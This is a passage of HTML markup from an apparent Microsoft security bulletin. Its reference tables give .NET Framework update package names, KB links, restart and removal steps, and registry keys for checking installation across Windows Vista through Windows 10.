class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3188730\" id=\"kb-link-76\" target=\"_self\">Microsoft Knowledge Base article 3188730</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5.1:<br/>This update does not add a registry key to validate its installation. Use WMI to detect this update. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows 8.1 (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Windows 8.1 for the Security Only Release..<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on Windows 8.1 for 32-bit Systems:<br/><span class=\"text-base\">Windows8.1- KB3188732-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on Windows 8.1 for x64-based Systems:<br/><span class=\"text-base\">Windows8.1-KB3188732-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">For Microsoft .NET Framework, see <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-77\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under Windows Update, click <span class=\"text-base\">View update history</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3188732\" id=\"kb-link-78\" target=\"_self\">Microsoft Knowledge Base article 3188732</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">These updates do not add a registry key to validate their installation. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2012 and Windows Server 2012 R2 (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Windows Server 2012 and Windows Server 2012 R2 for the Security Only Release..<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3188731-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3188732-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">For Microsoft .NET Framework, see <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-79\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under Windows Update, click <span class=\"text-base\">View update history</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3188731\" id=\"kb-link-80\" target=\"_self\">Microsoft Knowledge Base article 3188731</a><br/>See <a href=\"https://support.microsoft.com/help/3188732\" id=\"kb-link-81\" target=\"_self\">Microsoft Knowledge Base article 3188732</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">These updates do not add a registry key to validate their installation. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows 10 (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Windows 10 for the Security Only Release..<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3192440-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3192440-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on all supported 32-bit editions of Windows 10 version 1511:<br/><span class=\"text-base\">Windows10.0-KB3192441-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3192441-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on all supported 32-bit editions of Windows 10 version 1607:<br/><span class=\"text-base\">Windows10.0-KB3194798-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on all supported x64-based editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3194798-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">For Microsoft .NET Framework, see <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-82\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3192440\" id=\"kb-link-83\" target=\"_self\">Microsoft Knowledge Base article 3192440</a><br/>See <a href=\"https://support.microsoft.com/help/3192441\" id=\"kb-link-84\" target=\"_self\">Microsoft Knowledge Base article 3192441</a><br/>See <a href=\"https://support.microsoft.com/help/3194798\" id=\"kb-link-85\" target=\"_self\">Microsoft Knowledge Base article 3194798</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">These updates do not add a registry key to validate their installation. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows Vista (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Vista for the Monthly Rollup.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2 when installed on all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3188735-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2 when installed on all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">NDP45-KB3189051-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6 when installed on all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">NDP46-KB3189052-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2 when installed on all supported 64-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3188735-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2 when installed on all supported 64-bit editions of Windows Vista:<br/><span class=\"text-base\">NDP45-KB3189051-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6 when installed on all supported 64-bit editions of Windows Vista:<br/><span class=\"text-base\">NDP46-KB3189052-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-86\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2:<br/>Microsoft .NET Framework 3.0-KB3188735_*-msi0.txt<br/>Microsoft .NET Framework 3.0-KB3188735_*.html</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2:<br/>KB3189051_*_*-Microsoft .NET Framework [.NET target version]-MSP0.txt<br/>KB3189051_*_*.html</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6:<br/>KB3189052_*_*-Microsoft .NET Framework [.NET target version]-MSP0.txt<br/>KB3189052_*_*.html</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">For Microsoft .NET Framework:<br/>Click<span class=\"text-base\"> Control Panel</span>, and then click Security. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3188735\" id=\"kb-link-87\" target=\"_self\">Microsoft Knowledge Base article 3188735</a><br/>See <a href=\"https://support.microsoft.com/help/3189051\" id=\"kb-link-88\" target=\"_self\">Microsoft Knowledge Base article 3189051</a><br/>See <a href=\"https://support.microsoft.com/help/3189052\" id=\"kb-link-89\" target=\"_self\">Microsoft Knowledge Base article 3189052</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2:<br/>This update does not add a registry key to validate its installation. Use WMI to detect this update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2:<br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Microsoft .NET Framework <span class=\"sbody-italic\">[.NET target version]</span>\\KB3189051<br/>\u201dThisVersionInstalled\u201d = \u201cY\u201d</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6:<br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Microsoft .NET Framework 4.6\\ KB3189052<br/>\"ThisVersionInstalled\" = \"Y\"</td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2008 (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Windows Sever 2008 for the Monthly Rollup.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2 when installed on all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3188735-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2 when installed on all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">NDP45-KB3189051-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6 when installed on all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">NDP46-KB3189052-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2 when installed on all supported 64-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3188735-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2 when installed on all supported 64-bit editions of Windows Server 2008:<br/><span class=\"text-base\">NDP45-KB3189051-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6 when installed on all supported 64-bit editions of Windows Server 2008:<br/><span class=\"text-base\">NDP46-KB3189052-x86.msi</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-90\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2:<br/>Microsoft .NET Framework 3.0-KB3188735_*-msi0.txt<br/>Microsoft .NET Framework 3.0-KB3188735_*.html</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2:<br/>KB3189051_*_*-Microsoft .NET Framework [.NET target version]-MSP0.txt<br/>KB3189051_*_*.html</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6:<br/>KB3189052_*_*-Microsoft .NET Framework [.NET target version]-MSP0.txt<br/>KB3189052_*_*.html</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">For Microsoft .NET Framework:<br/>Click <strong class=\"uiterm\">Control Panel</strong>, and then click <strong class=\"uiterm\">Security</strong>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3188735\" id=\"kb-link-91\" target=\"_self\">Microsoft Knowledge Base article 3188735</a><br/>See <a href=\"https://support.microsoft.com/help/3189051\" id=\"kb-link-92\" target=\"_self\">Microsoft Knowledge Base article 3189051</a><br/>See <a href=\"https://support.microsoft.com/help/3189052\" id=\"kb-link-93\" target=\"_self\">Microsoft Knowledge Base article 3189052</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.0 Service Pack 2:<br/>This update does not add a registry key to validate its installation. Use WMI to detect this update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.5.2:<br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Microsoft .NET Framework <span class=\"sbody-italic\">[.NET target version]</span>\\KB3189051<br/>\u201dThisVersionInstalled\u201d = \u201cY\u201d</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 4.6:<br/>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Microsoft .NET Framework 4.6\\ KB3189052<br/>\"ThisVersionInstalled\" = \"Y\"</td></tr></table></div><h4 class=\"sbody-h4\"> Windows 7 Service Pack 1 (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Windows 7 Service Pack 1 for the Monthly Rollup.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5.1 on all supported 32-bit editions of Windows 7 Service Pack 1:<br/><span class=\"text-base\">Windows6.1-KB3188740-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5.1 on all supported x64-based editions of Windows 7 Service Pack 1:<br/><span class=\"text-base\">Windows6.1-KB3188740-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-94\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">Not applicable. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <span class=\"text-base\">System</span> and <span class=\"text-base\">Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3188740\" id=\"kb-link-95\" target=\"_self\">Microsoft Knowledge Base article 3188740</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">This update does not add a registry key to validate its installation. Use WMI to detect this update. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2008 R2 (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Windows Server 2008 for the Monthly Rollup.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5.1 on all supported x64-based editions of Windows Server 2008 R2 Service Pack 1:<br/><span class=\"text-base\">Windows6.1-KB3188740-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">For Microsoft .NET Framework, see <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-96\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3188740\" id=\"kb-link-97\" target=\"_self\">Microsoft Knowledge Base article 3188740</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5.1:<br/>This update does not add a registry key to validate its installation. Use WMI to detect this update. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows 8.1 (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Windows 8.1 for the Monthly Rollup.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on Windows 8.1 for 32-bit Systems:<br/><span class=\"text-base\">Windows8.1-<span class=\"text-base\">KB</span>3188743-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on Windows 8.1 for x64-based Systems:<br/><span class=\"text-base\">Windows8.1-KB3188743-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">For Microsoft .NET Framework, see <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-98\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under Windows Update, click <span class=\"text-base\">View update history</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3188743\" id=\"kb-link-99\" target=\"_self\">Microsoft Knowledge Base article 3188743</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">These updates do not add a registry key to validate their installation. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2012 and Windows Server 2012 R2 (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Windows Server 2012 and Windows Server 2012 R2 for the Monthly Rollup.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3188741-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3188743-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">For Microsoft .NET Framework, see <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-100\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">This update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are being used, this update will require a restart. If this behavior occurs, a message appears that advises you to restart. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under Windows Update, click <span class=\"text-base\">View update history</span>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3188741\" id=\"kb-link-101\" target=\"_self\">Microsoft Knowledge Base article 3188741</a><br/>See <a href=\"https://support.microsoft.com/help/3188743\" id=\"kb-link-102\" target=\"_self\">Microsoft Knowledge Base article 3188743</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">These updates do not add a registry key to validate their installation. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows 10 (.NET Framework Installations)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for .NET Framework installations running on all supported versions of Windows 10 for the Monthly Rollup.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3192440-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3192440-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on all supported 32-bit editions of Windows 10 version 1511:<br/><span class=\"text-base\">Windows10.0-KB3192441-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3192441-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on all supported 32-bit editions of Windows 10 version 1607:<br/><span class=\"text-base\">Windows10.0-KB3194798-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework 3.5 on all supported x64-based editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3194798-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">For Microsoft .NET Framework, see <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-103\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td 